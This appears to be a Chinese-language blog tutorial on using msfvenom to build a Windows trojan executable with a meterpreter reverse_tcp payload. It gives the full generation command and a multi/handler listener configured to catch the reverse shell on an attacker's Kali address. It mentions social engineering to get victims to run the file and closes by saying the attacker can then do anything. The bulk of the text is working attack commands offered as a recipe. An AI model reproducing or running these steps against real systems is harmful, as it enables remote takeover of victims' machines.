前言:

下面简单的演示一下msfvenom的简单使用,

攻击者:kali Linux  ip:172.30.23.44

靶机:Windows_server-2003

思路:利用msfvenom制作 .exe 文件,然后发送到靶机Windows上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机

0x01.利用msfvenom生成木马文件

1.在kali终端输入下面命令查看可用payload

msfvenom -lp

这里我们使用下面红色方框中的payload

下面是使用msfvenom的部分参数,是比较常用的

-p 选择一个payload

-l 载荷列表

-f 生成的文件格式

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。

-h 帮助

2.生成木马文件的命令是“msfvenom -p windows/meterpreter/reverse_tcp LHOST=[kali_linux本机IPv4地址] LPORT=80 -f exe -o trojanhorse.exe”,命令中,-p参数是使用指定payload模块,-f 指定格式,-o指定输出路径。

木马已经生成在了kali主目录下

0x02.利用web漏洞和社会工程学等手段让木马程序在受害机运行,这里不详说

0x03.利用msfconsole监听

依次输入下面命令,设置监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 172.30.23.44

set lport 80

exploit

上图监听开始了,等待目标运行木马程序,我直接在靶机点击运行

0x03.当靶机运行木马程序,会反弹一个shell到我的kali,接下来就可以为所欲为

标签: Kali_linux

添加新评论